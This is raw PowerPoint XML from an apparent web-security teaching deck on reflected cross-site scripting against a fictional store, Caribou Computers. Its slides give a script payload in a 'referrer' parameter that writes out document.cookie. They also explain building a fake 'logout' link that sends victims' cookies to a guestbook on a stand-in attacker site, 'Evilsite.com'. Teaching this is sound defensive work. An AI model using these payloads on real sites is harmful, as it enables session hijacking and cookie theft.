              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>='www.apple.com'&gt;Click to logout!&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>You should see something like the image on the left!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3462479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Caribou Computers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D234F38-7258-4B8D-A5C4-CE26D9119E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78768" y="2689779"/>
            <a:ext cx="5031422" cy="2108531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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6515944" y="2120900"/>
            <a:ext cx="4639736" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So now if we can get someone to click on our phony affiliate link, they will end up seeing our phony “Logout” link.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Since a link can point to any website anywhere on the internet AND it can carry data in the URL – just like a GET request. Links can be used to get data OUT of this site!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Now we just need some place to PUT this data!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34975023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altLang="zh-CN" dirty="0"/>
              <a:t>Evilsite.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D234F38-7258-4B8D-A5C4-CE26D9119E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60034" y="2689779"/>
            <a:ext cx="4668889" cy="2108531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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6515944" y="2120900"/>
            <a:ext cx="4639736" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To do that we’re going to need a site to host our scam.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Evilsite.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a simple home page that has some sponsorship links and a guestbook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The guestbook works by having an HTML form on the page that submits to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The comment is passed on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>URL line as a GET request!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Which means any URL or link with the correct field name will end up posting a comment on our site!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38915751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altLang="zh-CN" dirty="0"/>
              <a:t>Evilsite.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D234F38-7258-4B8D-A5C4-CE26D9119E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60034" y="2689779"/>
            <a:ext cx="4668889" cy="2108530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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6515944" y="2120900"/>
            <a:ext cx="4639736" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The referrer link on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Evilsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> right now simply takes us to Caribou's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>But we can change it to insert a phony “Click to Logout” URL on Caribou Computer’s site for anyone who clicks on it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>While we’re at it we can add a parameter to the “logout” URL so that when someone clicks on it posts a comment on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Evilsite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> like so…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php?comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29775316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altLang="zh-CN" dirty="0"/>
              <a:t>Evilsite.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D234F38-7258-4B8D-A5C4-CE26D9119E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60034" y="2689779"/>
            <a:ext cx="4668889" cy="2108530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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6515944" y="2120900"/>
            <a:ext cx="4639736" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are a million ways to do this but the one we are going to explore here is by embedding a set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tags!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Anything in those tags is executed as code right away! So, if we make a URL that ends with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?referrer=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The user’s cookie will appear right next to the referrer name!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="584586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altLang="zh-CN" dirty="0"/>
              <a:t>Evilsite.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D234F38-7258-4B8D-A5C4-CE26D9119E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60034" y="2689779"/>
            <a:ext cx="4668889" cy="2108530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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6515944" y="2120900"/>
            <a:ext cx="4639736" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function that immediately inserts this data into the HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Now we need make it output something like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</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evilsite.php?comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Then the contents of the cookie variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Then the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17383663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altLang="zh-CN" dirty="0"/>
              <a:t>Evilsite.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D234F38-7258-4B8D-A5C4-CE26D9119E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60034" y="2689779"/>
            <a:ext cx="4668889" cy="2108530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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6515944" y="2120900"/>
            <a:ext cx="4639736" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>That’s a little more difficult than it seems.  JavaScript can be tricky and it’s important to get the quotes matched just right.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Adding a " would mess up the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tag we have this data in.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We can fix that by using a JavaScript function</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String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>which lets us tell JavaScript to output a character by its ASCII code.  For a quote it’s 34</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Also, we need to tell JavaScript to combine these strings into one.  One way to do that is to use the + operator. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24593291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EA2EB-CF12-47E0-9BF4-CC04045BBDD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643466" y="786383"/>
            <a:ext cx="3517567" cy="2093975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A7:2017-Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3EAB567-DD21-4A73-9AD9-BB3328DD328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609341" y="1334185"/>
            <a:ext cx="5627629" cy="4251985"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F82F0C2-C659-4914-BC81-CFBC1D0526D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643465" y="3043050"/>
            <a:ext cx="3517567" cy="3064505"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40868405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altLang="zh-CN" dirty="0"/>
              <a:t>Evilsite.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
